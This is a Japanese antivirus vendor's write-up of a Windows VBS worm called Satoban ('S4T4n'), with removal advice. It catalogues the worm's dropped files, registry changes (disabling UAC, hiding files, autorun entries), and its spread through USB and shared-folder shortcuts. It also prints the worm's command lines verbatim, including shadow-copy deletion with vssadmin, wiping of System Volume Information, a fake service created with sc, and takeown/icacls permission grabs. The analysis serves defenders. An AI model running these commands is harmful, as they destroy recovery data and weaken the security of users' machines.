検出した場合の対処方法
常駐監視を行っている各検査プログラムによって検出された場合は、駆除もしくは削除を行ってください。駆除もしくは削除ができない場合は、Windows のシステムの復元により修復しなければならない可能性があります。
対象のファイルが身に覚えのないファイル名の場合は、そのファイル自身がウイルスそのものである可能性が高いので、駆除ではなくすべて削除をしてください。これにより2次感染、3次感染を防げます。また、自分が作成したデータ等に感染していた場合は、駆除が可能な場合もありますが、駆除のボタンが押せない状態もしくは駆除しても失敗する場合は、すでに元のデータの戻せない状態までデータが書き換えられている場合もあります。この場合もすべて削除してください。
解説での表記(用語)について
以下の説明文では、Windowsオペレーティングシステムがインストールされたディレクトリを%windir% と表記しており、インストール時の設定により異なる場合があります。%windir% のサブディレクトリである"System"や"System32"は %system% と表記しています。
%allusersprofile%はAll Usersのマイドキュメントディレクトリを表記しています。
%drive%には、任意のドライブ名が入ります。
%temp%はWindowsオペレーティングシステムのテンポラリディレクトリを表記しています。
%systemdrive%は、システムドライブを表記しています。
%systemroot%は、オペレーティングシステムがインストールされたディレクトリを表記しています。
解説
■侵入(インストレーション)について
このワームは、実行時に次のフォルダーを作成します。
%systemdrive%\Kernel
%systemdrive%\Kernel\lpt1
%systemdrive%\security
%systemdrive%\security\lpt1
%systemroot%\system32\system
%systemroot%\system32\system\msg
自身を次の場所にコピーします。
%systemdrive%\Kernel\r00t3er
%systemdrive%\security\blood.dat
%systemdrive%\Kernelフォルダーと%systemdrive%\securityフォルダーには、Windows Explorer内で表示されないようにするため、システム(S)属性と隠し(H)属性が設定される場合があります。
%systemdrive%\Kernel\r00t3erファイルには、Windows Explorer内で表示されないようにするため、システム(S)属性と隠し(H)属性が設定される場合があります。
次のファイルを作成します。
%allusersprofile%\rescue.vbe (1890 B, VBS/TrojanDownloader.Psyme.NJJ)
%systemroot%\system32\system\svchost.exe (12 B)
%systemroot%\system32\system\msg\config.txt (426 B)
%temp%\tmp.vbe (2178 B, VBS/Satoban.A)
%temp%\b.bat (2086 B, VBS/Satoban.A)
%systemdrive%\security\system.vbs (123 B, VBS/Satoban.A)
次のファイルのコピー(コピー元、コピー先)を作成する場合があります。
%systemroot%\system32\wscript.exe, %systemdrive%\security\svchost.exe
次の命令を実行します。
sc create system binPath= "%systemroot%\System32\system\svchost.exe msg" start= auto &
net start system &
sc description system " processus generique de Windows .Si ce service est arrete,les services qui en dependent ne pourront pas demarrer et votre systeme risque d'etre endommage. " &
EXIT
システムが起動するたびに実行されるよう、次のレジストリーエントリーを登録します。
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"rescue" = "%allusersprofile%\rescue.vbe"
次のレジストリーエントリーを作成します。
[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]
"Timeout" = 0
[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System]
"DisableCMD" = 0
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = 0
"DisableTaskMgr" = 0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate]
"sdate" = "38"
[HKEY_CLASSES_ROOT\Applications\Notepad2.exe\Shell\Open]
"command" = "%systemroot%\System32\Notepad.exe"
[HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\open]
"command" = "%systemroot%\System32\Notepad.exe"
[HKEY_CLASSES_ROOT\Batfile\Shell\Edit\Command]
"" = "%systemroot%\System32\Notepad.exe"
[HKEY_CLASSES_ROOT\VBEFile\Shell\Edit\Command]
"" = "%systemroot%\System32\Notepad.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = 2
"ShowSuperHidden" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\System]
"Type" = 16
"Start" = 2
"ErrorControl" = 1
"ImagePath" = "%systemroot%\System32\system\svchost.exe msg"
"ObjectName" = "LocalSystem"
"Description" = " processus generique de Windows .Si ce service est arrete,les services qui en dependent ne pourront pas demarrer et votre systeme risque d'etre endommage. "
次のフォルダーに保存されたファイルを削除する場合があります。
%systemdrive%\Kernel
%systemdrive%\security
■感染について
このワームは、利用可能なローカルドライブやリムーバブルドライブを探します。次のファイルを削除する場合があります。
%drive%\*.vbe
%drive%\*.lnk
%drive%\config.dat
%drive%\autorun.inf
%drive%\microsoft.dat
次のフォルダーを探します。
%drive%\*.*
次のファイルを作成します。
%drive%\%variable%.lnk
新たに作成されるファイルの名前には、検出されたフォルダーの名前が利用されます。
作成されたファイルは悪意のあるファイルへのショートカットです。
自身を次の場所にコピーします。
%drive%\config.dat
この%drive%\config.datファイルには、Windows Explorer内で表示されないようにするため、システム(S)属性と隠し(H)属性が設定される場合があります。
■共有フォルダーを経由した感染について
このワームは、さまざまな共有フォルダーを探します。
次のファイルを削除する場合があります。
%sharedfolder%\*.vbe
%sharedfolder%\*.lnk
次のファイルを作成します。
%sharedfolder%\Mariage.lnk
作成されたファイルは悪意のあるファイルへのショートカットです。
自身を次の場所にコピーします。
%sharedfolder%\Update.dat
この%sharedfolder%\Update.datファイルには、Windows Explorer内で表示されないようにするため、システム(S)属性と隠し(H)属性が設定される場合があります。
■その他の情報
このワームは、次のレジストリーエントリーを設定する場合があります。
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin" = 0
"EnableLua" = 0
[HKEY_CURRENT_USER\VBEFile\DefaultIcon]
"" = "%systemroot%\system32\shell32.dll,1"
次のレジストリーエントリーを削除する場合があります。
[HKEY_CLASSES_ROOT\lnkfile]
"IsShortCut"
次のファイルを作成する場合があります。
%temp%\uac.bat (1904 B, VBS/Agent.NCF)
%temp%\ADMIN.vbe (292 B, VBS/AutoRun.HX)
%temp%\CPBA.bat (390 B, VBS/Satoban.A)
%temp%\tp.vbe (175 B, VBS/AutoRun.HX)
%temp%\tmp.bat (1108 B, VBS/Agent.NCF)
インターネットからファイルをダウンロードする場合があります。7つのURLを保持しています。通信にはHTTPプロトコルが使用されます。
ダウンロードしたファイルを次の場所に保存します。
%systemdrive%\security\system.txt
%temp%\booter.dat
%systemdrive%\kernel\explorer.jpg
%systemdrive%\kernel\update.txt
次のファイルを移動(移動元、移動先)します。
%systemdrive%\security\system.txt, %systemdrive%\security\system.vbe
%temp%\booter.dat, %temp%\reskp.exe
%systemdrive%\security\system.txt, %systemdrive%\security\system.bat
%systemdrive%\security\system.txt, %systemdrive%\security\system.exe
%systemdrive%\kernel\explorer.jpg, %systemdrive%\kernel\explorer.exe
%systemdrive%\kernel\update.txt, %systemdrive%\kernel\Update.exe
%systemroot%\system32\drivers\flpydisk.sys, %systemroot%\system32\drivers\flpydisk.sy_
次のファイルのコピー(コピー元、コピー先)を作成します。
%systemdrive%\kernel\*.vbe, %temp%
%scriptpath%, %temp%
次のファイルを削除します。
%systemdrive%\*.lnk
%systemdrive%\autorun.inf
%temp%\%scriptfile%
次の命令を実行する場合があります。
cmd /K takeown /F %systemdrive%\kernel /A /R /D O &
CACLS %systemdrive%\Kernel /E /T /C /G %username%:F &
takeown /F %systemdrive%\security /A /R /D O &
CACLS %systemdrive%\security /E /T /C /G %username%:F &
takeown /F "%allusersprofile%\" /A /R /D O &
takeown /a /f %systemroot%\System32\wscript.exe &
ICACLS %systemroot%\System32\wscript.exe /Grant %username%:F &
takeown /F "%systemroot%\system32\drivers" /A /R /D O &
takeown /a /f %systemroot%\System32\drivers\flpydisk.sys &
ICACLS %systemroot%\System32\drivers\flpydisk.sys /Grant %username%:F &
takeown /F "%systemdrive%\system Volume Information" /A /R /D O &
CACLS "%systemdrive%\system Volume Information" /E /T /C /G %username%:F &
EXIT
sc config TermService start= auto > nul
svchost.exe /e:VBScript.Encode %systemdrive%\security\blood.dat
cmd /K vssadmin delete shadows /all /quiet & cd/d "%systemdrive%\system volume Information" &
del/f/s/q/a "%systemdrive%\system volume Information\*.*" &
EXIT
cmd /K md %systemroot%\system32\system &
md %systemroot%\system32\system\msg &
EXIT
cmd /u /K ( @echo DisplayName=msg&@echo Description=Description&
@echo ServiceType=272&
echo WaitActive=0&
@echo StartType=2&
@echo ErrorControl=1&
@echo Source=%systemdrive%\security\system.vbs&
@echo ResetPeriod=0&
@echo RebootMsg=&
@echo Command=&
@echo nActions=0&
@ echo Actions=&
@echo StartAtTime=OneTime) > %systemroot%\system32\system\msg\config.txt &
EXIT
cmd /K cd/d %systemroot%\system32\drivers &
ren flpydisk.sys flpydisk.sy_ &
del/f/q/s %systemdrive%\security\system.bat &
del/f/q/s %systemdrive%\security\system.exe &
del/f/q/s %systemdrive%\kernel\explorer.exe &
del/f/q/s %systemdrive%\kernel\update.exe &
del/f/q/s ""%temp%\reskp.exe"" &
rd/q/s %systemdrive%\system32 &
rd/q/s %systemdrive%\system &
EXIT
cmd /K del/f/q/A "%systemdrive%\security\*.dat" &
xcopy /C /H /Y /R "%drive%\config.dat" "%systemdrive%\security" &
attrib -s -h "%systemdrive%\security\*.*" &
ren "%systemdrive%\security\*.*" blood.dat &
EXIT
cmd /K del/f/q/A "%systemdrive%\kernel\*.dat" &
xcopy /C /H /Y /R "%drive%\config.dat" "%systemdrive%\kernel" &
attrib -s -h "%systemdrive%\kernel\*.*" &
ren "%systemdrive%\kernel\*.*" r00t3r &
attrib +s +h "%systemdrive%\kernel\*.*" &
EXIT
cmd /K cd/d "%systemdrive%\security" &
copy /b /y blood.dat + &
EXIT
システムの復元ポイントを削除します。
このワームのファイルには次の文字列が記述されています。
'========================================================================================='
'
' C0d3 N4me : S4T4n
' Cr34t0r : R4PTOR
' Created for personal use , modifications or others are not authorized
' For more informations, looking 4 me { - CNG4L on Race }
'
'========================================================================================='
|
